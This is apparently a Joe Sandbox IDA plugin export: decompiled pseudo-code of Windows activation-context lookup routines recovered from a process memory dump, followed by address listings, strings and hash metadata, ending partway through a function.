												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = L33D0A600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E33D0A760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x33de91e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = L33CF4428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = L33D0A600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					L33D7EF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												L33D7EF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}


























































                                                                                                                                                                                            0x33d0a178
                                                                                                                                                                                            0x33d0a17f
                                                                                                                                                                                            0x33d0a182
                                                                                                                                                                                            0x33d0a18f
                                                                                                                                                                                            0x33d0a4b4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d577ce
                                                                                                                                                                                            0x33d577ce
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d577ce
                                                                                                                                                                                            0x33d0a195
                                                                                                                                                                                            0x33d0a195
                                                                                                                                                                                            0x33d0a199
                                                                                                                                                                                            0x33d0a1a1
                                                                                                                                                                                            0x33d0a1a9
                                                                                                                                                                                            0x33d0a1b1
                                                                                                                                                                                            0x33d577f3
                                                                                                                                                                                            0x33d577f3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a1b7
                                                                                                                                                                                            0x33d0a1b7
                                                                                                                                                                                            0x33d0a1c0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a1c6
                                                                                                                                                                                            0x33d0a1c6
                                                                                                                                                                                            0x33d0a1cc
                                                                                                                                                                                            0x33d0a5dc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a5e2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a5e2
                                                                                                                                                                                            0x33d0a1d2
                                                                                                                                                                                            0x33d0a1d4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a1da
                                                                                                                                                                                            0x33d0a1da
                                                                                                                                                                                            0x33d0a1dd
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a1e3
                                                                                                                                                                                            0x33d0a1e3
                                                                                                                                                                                            0x33d0a1e6
                                                                                                                                                                                            0x33d0a1fa
                                                                                                                                                                                            0x33d0a1fd
                                                                                                                                                                                            0x33d0a5f0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a5f6
                                                                                                                                                                                            0x33d577fd
                                                                                                                                                                                            0x33d57802
                                                                                                                                                                                            0x33d57807
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d57807
                                                                                                                                                                                            0x33d0a203
                                                                                                                                                                                            0x33d0a203
                                                                                                                                                                                            0x33d0a208
                                                                                                                                                                                            0x33d0a20b
                                                                                                                                                                                            0x33d0a20f
                                                                                                                                                                                            0x33d0a216
                                                                                                                                                                                            0x33d0a21c
                                                                                                                                                                                            0x33d0a224
                                                                                                                                                                                            0x33d0a228
                                                                                                                                                                                            0x33d0a22b
                                                                                                                                                                                            0x33d0a233
                                                                                                                                                                                            0x33d0a23b
                                                                                                                                                                                            0x33d0a23f
                                                                                                                                                                                            0x33d0a243
                                                                                                                                                                                            0x33d0a247
                                                                                                                                                                                            0x33d0a250
                                                                                                                                                                                            0x33d0a252
                                                                                                                                                                                            0x33d0a255
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a25b
                                                                                                                                                                                            0x33d0a263
                                                                                                                                                                                            0x33d0a26f
                                                                                                                                                                                            0x33d0a26f
                                                                                                                                                                                            0x33d0a277
                                                                                                                                                                                            0x33d0a27d
                                                                                                                                                                                            0x33d0a3ae
                                                                                                                                                                                            0x33d0a3ae
                                                                                                                                                                                            0x33d0a3b4
                                                                                                                                                                                            0x33d0a3be
                                                                                                                                                                                            0x33d57823
                                                                                                                                                                                            0x33d57826
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5782c
                                                                                                                                                                                            0x33d5782c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5782c
                                                                                                                                                                                            0x33d0a3c4
                                                                                                                                                                                            0x33d0a3c4
                                                                                                                                                                                            0x33d0a3c9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a3c9
                                                                                                                                                                                            0x33d0a283
                                                                                                                                                                                            0x33d0a283
                                                                                                                                                                                            0x33d0a288
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a288
                                                                                                                                                                                            0x33d0a265
                                                                                                                                                                                            0x33d0a265
                                                                                                                                                                                            0x33d0a269
                                                                                                                                                                                            0x33d0a4bf
                                                                                                                                                                                            0x33d0a4c2
                                                                                                                                                                                            0x33d0a4c8
                                                                                                                                                                                            0x33d0a4e3
                                                                                                                                                                                            0x33d5780e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a4e9
                                                                                                                                                                                            0x33d0a4ec
                                                                                                                                                                                            0x33d57819
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a4f2
                                                                                                                                                                                            0x33d0a4f2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a4f2
                                                                                                                                                                                            0x33d0a4ec
                                                                                                                                                                                            0x33d0a4ca
                                                                                                                                                                                            0x33d0a4ca
                                                                                                                                                                                            0x33d0a4cc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a4d2
                                                                                                                                                                                            0x33d0a4d2
                                                                                                                                                                                            0x33d0a4d2
                                                                                                                                                                                            0x33d0a4d7
                                                                                                                                                                                            0x33d0a28c
                                                                                                                                                                                            0x33d0a28e
                                                                                                                                                                                            0x33d57833
                                                                                                                                                                                            0x33d57838
                                                                                                                                                                                            0x33d57838
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a294
                                                                                                                                                                                            0x33d0a2a5
                                                                                                                                                                                            0x33d0a2ac
                                                                                                                                                                                            0x33d0a3d2
                                                                                                                                                                                            0x33d0a3d9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a3e8
                                                                                                                                                                                            0x33d0a3e8
                                                                                                                                                                                            0x33d0a3ec
                                                                                                                                                                                            0x33d0a3f0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a3f0
                                                                                                                                                                                            0x33d0a2b2
                                                                                                                                                                                            0x33d0a2b2
                                                                                                                                                                                            0x33d0a2d2
                                                                                                                                                                                            0x33d0a2d6
                                                                                                                                                                                            0x33d0a2d8
                                                                                                                                                                                            0x33d0a2da
                                                                                                                                                                                            0x33d0a2dc
                                                                                                                                                                                            0x33d0a2de
                                                                                                                                                                                            0x33d5783a
                                                                                                                                                                                            0x33d5783c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d57842
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d57842
                                                                                                                                                                                            0x33d0a2e4
                                                                                                                                                                                            0x33d0a2e4
                                                                                                                                                                                            0x33d0a2e4
                                                                                                                                                                                            0x33d0a2eb
                                                                                                                                                                                            0x33d578ed
                                                                                                                                                                                            0x33d578ed
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a2f1
                                                                                                                                                                                            0x33d0a2f1
                                                                                                                                                                                            0x33d0a300
                                                                                                                                                                                            0x33d0a300
                                                                                                                                                                                            0x33d0a300
                                                                                                                                                                                            0x33d0a30a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a310
                                                                                                                                                                                            0x33d0a325
                                                                                                                                                                                            0x33d0a32c
                                                                                                                                                                                            0x33d0a4f7
                                                                                                                                                                                            0x33d0a500
                                                                                                                                                                                            0x33d0a502
                                                                                                                                                                                            0x33d0a505
                                                                                                                                                                                            0x33d0a50b
                                                                                                                                                                                            0x33d0a5a5
                                                                                                                                                                                            0x33d0a5b8
                                                                                                                                                                                            0x33d0a5be
                                                                                                                                                                                            0x33d0a5c2
                                                                                                                                                                                            0x33d0a5cb
                                                                                                                                                                                            0x33d0a5d1
                                                                                                                                                                                            0x33d0a5d1
                                                                                                                                                                                            0x33d0a5cb
                                                                                                                                                                                            0x33d0a50b
                                                                                                                                                                                            0x33d0a523
                                                                                                                                                                                            0x33d0a549
                                                                                                                                                                                            0x33d0a551
                                                                                                                                                                                            0x33d0a525
                                                                                                                                                                                            0x33d0a53c
                                                                                                                                                                                            0x33d0a543
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a543
                                                                                                                                                                                            0x33d0a332
                                                                                                                                                                                            0x33d0a337
                                                                                                                                                                                            0x33d0a393
                                                                                                                                                                                            0x33d0a399
                                                                                                                                                                                            0x33d0a339
                                                                                                                                                                                            0x33d0a339
                                                                                                                                                                                            0x33d0a342
                                                                                                                                                                                            0x33d0a344
                                                                                                                                                                                            0x33d0a34a
                                                                                                                                                                                            0x33d0a34e
                                                                                                                                                                                            0x33d0a355
                                                                                                                                                                                            0x33d0a359
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a360
                                                                                                                                                                                            0x33d0a363
                                                                                                                                                                                            0x33d0a3fa
                                                                                                                                                                                            0x33d0a3fc
                                                                                                                                                                                            0x33d57847
                                                                                                                                                                                            0x33d5784f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d57855
                                                                                                                                                                                            0x33d57855
                                                                                                                                                                                            0x33d57859
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5785f
                                                                                                                                                                                            0x33d5785f
                                                                                                                                                                                            0x33d57862
                                                                                                                                                                                            0x33d57868
                                                                                                                                                                                            0x33d57892
                                                                                                                                                                                            0x33d57894
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5786a
                                                                                                                                                                                            0x33d5786d
                                                                                                                                                                                            0x33d5787e
                                                                                                                                                                                            0x33d5788b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d57880
                                                                                                                                                                                            0x33d57880
                                                                                                                                                                                            0x33d57885
                                                                                                                                                                                            0x33d5789a
                                                                                                                                                                                            0x33d5789a
                                                                                                                                                                                            0x33d5789f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5789f
                                                                                                                                                                                            0x33d5786f
                                                                                                                                                                                            0x33d57873
                                                                                                                                                                                            0x33d5788e
                                                                                                                                                                                            0x33d5788e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d5788e
                                                                                                                                                                                            0x33d5786d
                                                                                                                                                                                            0x33d57868
                                                                                                                                                                                            0x33d57859
                                                                                                                                                                                            0x33d0a402
                                                                                                                                                                                            0x33d0a402
                                                                                                                                                                                            0x33d0a405
                                                                                                                                                                                            0x33d0a554
                                                                                                                                                                                            0x33d0a556
                                                                                                                                                                                            0x33d0a55e
                                                                                                                                                                                            0x33d0a564
                                                                                                                                                                                            0x33d0a56a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a570
                                                                                                                                                                                            0x33d0a570
                                                                                                                                                                                            0x33d0a575
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a575
                                                                                                                                                                                            0x33d0a40b
                                                                                                                                                                                            0x33d0a40e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a414
                                                                                                                                                                                            0x33d0a414
                                                                                                                                                                                            0x33d0a418
                                                                                                                                                                                            0x33d0a420
                                                                                                                                                                                            0x33d0a426
                                                                                                                                                                                            0x33d0a42c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a432
                                                                                                                                                                                            0x33d0a432
                                                                                                                                                                                            0x33d0a437
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a437
                                                                                                                                                                                            0x33d0a42c
                                                                                                                                                                                            0x33d0a40e
                                                                                                                                                                                            0x33d0a405
                                                                                                                                                                                            0x33d0a369
                                                                                                                                                                                            0x33d0a369
                                                                                                                                                                                            0x33d0a36c
                                                                                                                                                                                            0x33d578e3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a372
                                                                                                                                                                                            0x33d0a372
                                                                                                                                                                                            0x33d0a374
                                                                                                                                                                                            0x33d0a452
                                                                                                                                                                                            0x33d0a459
                                                                                                                                                                                            0x33d0a57e
                                                                                                                                                                                            0x33d0a585
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a594
                                                                                                                                                                                            0x33d0a594
                                                                                                                                                                                            0x33d0a598
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a598
                                                                                                                                                                                            0x33d0a45f
                                                                                                                                                                                            0x33d0a45f
                                                                                                                                                                                            0x33d0a47f
                                                                                                                                                                                            0x33d0a483
                                                                                                                                                                                            0x33d0a485
                                                                                                                                                                                            0x33d0a487
                                                                                                                                                                                            0x33d0a489
                                                                                                                                                                                            0x33d0a48b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a491
                                                                                                                                                                                            0x33d0a493
                                                                                                                                                                                            0x33d578a8
                                                                                                                                                                                            0x33d578b1
                                                                                                                                                                                            0x33d578c3
                                                                                                                                                                                            0x33d578c3
                                                                                                                                                                                            0x33d578cb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d578d6
                                                                                                                                                                                            0x33d578dc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d578de
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d578de
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d578dc
                                                                                                                                                                                            0x33d578c3
                                                                                                                                                                                            0x33d578b1
                                                                                                                                                                                            0x33d0a499
                                                                                                                                                                                            0x33d0a499
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a499
                                                                                                                                                                                            0x33d0a48b
                                                                                                                                                                                            0x33d0a37a
                                                                                                                                                                                            0x33d0a37a
                                                                                                                                                                                            0x33d0a37f
                                                                                                                                                                                            0x33d0a381
                                                                                                                                                                                            0x33d0a49b
                                                                                                                                                                                            0x33d0a49b
                                                                                                                                                                                            0x33d0a4a2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a4a8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a4a8
                                                                                                                                                                                            0x33d0a387
                                                                                                                                                                                            0x33d0a387
                                                                                                                                                                                            0x33d0a38c
                                                                                                                                                                                            0x33d0a38e
                                                                                                                                                                                            0x33d0a38e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a38c
                                                                                                                                                                                            0x33d0a381
                                                                                                                                                                                            0x33d0a374
                                                                                                                                                                                            0x33d0a36c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a363
                                                                                                                                                                                            0x33d0a360
                                                                                                                                                                                            0x33d0a337
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a32c
                                                                                                                                                                                            0x33d578f1
                                                                                                                                                                                            0x33d578f1
                                                                                                                                                                                            0x33d578fc
                                                                                                                                                                                            0x33d57904
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d57904
                                                                                                                                                                                            0x33d0a2eb
                                                                                                                                                                                            0x33d0a2de
                                                                                                                                                                                            0x33d0a2ac
                                                                                                                                                                                            0x33d0a28e
                                                                                                                                                                                            0x33d0a4cc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a269
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a39c
                                                                                                                                                                                            0x33d0a39c
                                                                                                                                                                                            0x33d0a39f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a3a5
                                                                                                                                                                                            0x33d0a3a8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a3a8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a39f
                                                                                                                                                                                            0x33d0a250
                                                                                                                                                                                            0x33d0a1e8
                                                                                                                                                                                            0x33d0a1f1
                                                                                                                                                                                            0x33d577d8
                                                                                                                                                                                            0x33d577dd
                                                                                                                                                                                            0x33d577e2
                                                                                                                                                                                            0x33d577e7
                                                                                                                                                                                            0x33d577e7
                                                                                                                                                                                            0x33d577e9
                                                                                                                                                                                            0x33d577eb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a1f7
                                                                                                                                                                                            0x33d0a1f7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d0a1f7
                                                                                                                                                                                            0x33d0a1f1
                                                                                                                                                                                            0x33d0a1e6
                                                                                                                                                                                            0x33d0a1dd
                                                                                                                                                                                            0x33d0a1d4
                                                                                                                                                                                            0x33d0a1cc
                                                                                                                                                                                            0x33d0a1c0
                                                                                                                                                                                            0x33d0a1b1
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            Strings
                                                                                                                                                                                            • Actx , xrefs: 33D57819, 33D57880
                                                                                                                                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33D57807
                                                                                                                                                                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 33D578F3
                                                                                                                                                                                            • SsHd, xrefs: 33D0A304
                                                                                                                                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33D577E2
                                                                                                                                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 33D577DD, 33D57802
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                            • API String ID: 0-1988757188
                                                                                                                                                                                            • Opcode ID: cfc2c19ce4c904efb80c55b83b919ffc48d8e92713b73b7848faf4efad2e9af3
                                                                                                                                                                                            • Instruction ID: 59c177b0866ce9e4b24c8b8972fe1ad39157057fd876eeb248195cdbe62f8529
                                                                                                                                                                                            • Opcode Fuzzy Hash: cfc2c19ce4c904efb80c55b83b919ffc48d8e92713b73b7848faf4efad2e9af3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 49E10278A043018FE714CE74C894B5ABBE5BB84B54F580A2DF8A5CB290DB31D94DCF92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D0D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                                                            			E33D0D690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x33deb370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return L33D34B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
